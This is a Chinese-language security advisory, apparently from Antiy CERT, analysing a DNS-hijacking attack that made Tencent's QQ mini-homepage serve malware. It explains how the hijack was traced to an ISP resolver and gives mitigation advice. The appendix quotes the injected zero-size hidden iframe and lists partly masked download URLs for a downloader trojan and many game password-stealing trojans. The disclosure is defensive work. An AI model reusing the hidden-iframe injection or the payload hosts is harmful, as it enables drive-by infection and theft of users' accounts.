11月3日，安天实验室反恶意代码监测网发现，部分用户在访问腾讯迷你首页网站
( http://mini****.qq.com/)时，会被恶意代码感染，系统会自动从恶意网站上下载
并运行恶意程序。由于该站点为QQ软件启动时默认自动弹出，具有极高的访问量，安
天CERT及时发出了预警信息并通知了有关部门。

　　通过进一步的技术分析，发现攻击者采用的攻击方法为劫持DNS解析过程，篡改腾
讯迷你首页的DNS记录，攻击点发生在运营商的DNS服务器或该服务器的上行网络环境
中，影响用户为使用该DNS的用户。

确认的过程如下：
　　通过有关渠道确认58.215.79.*非腾讯机房IP，排除腾讯机房自身问题。向多个DNS
发起请求，发现DNS服务器219.150.32.*返回错误的地址信息，判定攻击为DNS劫持。通
过位于全球的多个监测节点向该DNS发起解析，得到同样被篡改的解析结果，排除单个监
测节点的线路被劫持。

　　通过以上手段，可以定位攻击发生在该DNS或该DNS连入互联网的上行网络环境中，
攻击方法为篡改特定DNS的记录, 造成服务器正常的DNS响应被修改，用户访问的网页中
被插入恶意链接，这种攻击方式，具有针对性，并有一定的隐蔽性，处理上需要多个环
节的协同，增加了处理的难度。

　　由于该服务器返回的解析结果有时正确，有时错误，我们猜测是DNS服务器受到了
ARP欺骗攻击，而由于该ARP欺骗软件的效率问题，导致未能劫持全部DNS解析记录，从
而向该DNS的解析有时正确，有时错误。

受攻击用户估算：
　　通过初步估算预计被攻击用户量应超过万客户端，但由于部分用户为企业专线用户，
同时由于QQ非官方版本和客户端安全措施的存在，准确估计感染数量有一定难度。目前
尚未得到其他DNS受到同类攻击的记录。

估算模型可以简化为如下方法：
受攻击用户数量=估算该DNS用户量x攻击持续时间x腾讯的单日活跃用户比率

安全提示：
　　用户可以自行检测所使用DNS对minisite.qq.com的解析结果，如为58.215.79.*，
应为受到相关攻击，企业用户可以在防火墙中阻止对该IP连接。个人用户也可做相应
设置，并及时升级您的反恶意代码软件。

　　因发出预警报告后，由于腾讯公司在我国显著的知名度，有部分网友向我们咨询
是否是腾讯公司机房被入侵，所以特定重新做了相关的技术分析，从本次技术分析的
结果看，攻击未显示腾讯公司机房有被入侵现象，攻击环节发生在运营商处，因腾讯
的大量用户而被攻击者选为攻击目标。为了防止误解，我们修改了本次预警报告。

　　腾讯公司已经在网络安全方面做了大量的投入，并在客户端安全做了大量的工作，
如QQ安全医生，键盘保护等措施，取得了一定的效果。但由于QQ软件庞大的装机量和活
跃用户量，QQ和其各相关环节已经成了众多攻击者的首选目标，攻击者的攻击手法层出
不穷，这一次攻击巧妙的攻击了一个中间环节，从而达到了攻击大批用户终端的目的。

　　我们建议腾讯公司在客户端内嵌入反DNS 劫持措施，由于腾讯公司在用户客户端有
相应软件并具备在线升级功能，从而比起单独的网站来对于DNS劫持天然具有更好的抵御
能力，比如一种做法是，可以将正确的DNS解析库签名后定期升级到用户客户端，并在客
户端做相应的校验。这里顺便厚颜做一下广告：该措施和其它一些反DNS劫持手段也为安
天公司的下一代主机保护产品所使用。

其他问题：
　　为什么从该DNS解析其他IP正常，由于没有继续分析，尚无法确认仅腾讯ip解析出现
问题。但可以理解攻击者为增加隐蔽性，一般只会选择少量数据进行篡改，而由于腾讯MINISITE是缺省自动弹出的，加上qq软件在中国的超高普及率，自然成为攻击者的首选
篡改目标。

附录：被攻击客户端相关记录
　　
　　该网站的主页上里被插入如下框架图所示：

　　

　　框架代码：
　　<iframe src=admin.htm width=0 height=0></iframe>。
　　admin.htm是一个网马页面代码：

　　

　　当用户访问http://min*****.qq.com/all/allinone.shtml时，系统会自动隐藏下载
以下病毒文件：
　　
　　http://58.215.79.**/svcos.exe
　　病毒名：(Trojan-Downloader.Win32.Delf.csw) 下载者木马

　　一旦运行该木马将下载以下病毒到用户的系统，并运行。
　　
　　http://58.215.79.**/1.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gpn) 游戏盗号木马
　　
　　http://58.215.79.**/2.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gqn) 游戏盗号木马

　　http://58.215.79.**/3.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ftv) 游戏盗号木马

　　http://58.215.79.**/4.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gnc) 游戏盗号木马

　　http://58.215.79.**/5.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.fhm) 游戏盗号木马

　　http://58.215.79.**/6.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gqo) 游戏盗号木马
　　
　　http://58.215.79.**/7.exe
　　病毒名：(Trojan-PSW.Win32.WOW.acu) 　　　　游戏盗号木马

　　http://58.215.79.**/8.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gpc) 游戏盗号木马

　　http://58.215.79.**/9.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gkv) 游戏盗号木马

　　http://58.215.79.**/10.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gpz) 游戏盗号木马

　　http://58.215.79.**/11.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gpw) 游戏盗号木马

　　http://58.215.79.**/12.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gqb) 游戏盗号木马
　　
　　http://58.215.79.**/13.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gne) 游戏盗号木马

　　http://58.215.79.**/14.exe
　　病毒名：( ) 　　　　　　　　　　　　　　　 地址失效

　　http://58.215.79.**/15.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gpx) 游戏盗号木马

　　http://58.215.79.**/16.exe
　　病毒名：( ) 　　　　　　　　　　　　　　　 地址失效

　　http://58.215.79.**/17.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gpx) 游戏盗号木马

　　http://58.215.79.**/18.exe
　　病毒名：( ) 　　　　　　　　　　　　　　　 地址失效

　　http://58.215.79.**/19.exe
　　病毒名：( ) 　　　　　　　　　　　　　　　 地址失效

　　http://58.215.79.**/20.exe
　　病毒名：( ) 　　　　　　　　　　　　　　　 地址失效

点击此处下载木马防线2005+

病毒上报信箱: submit@virusview.net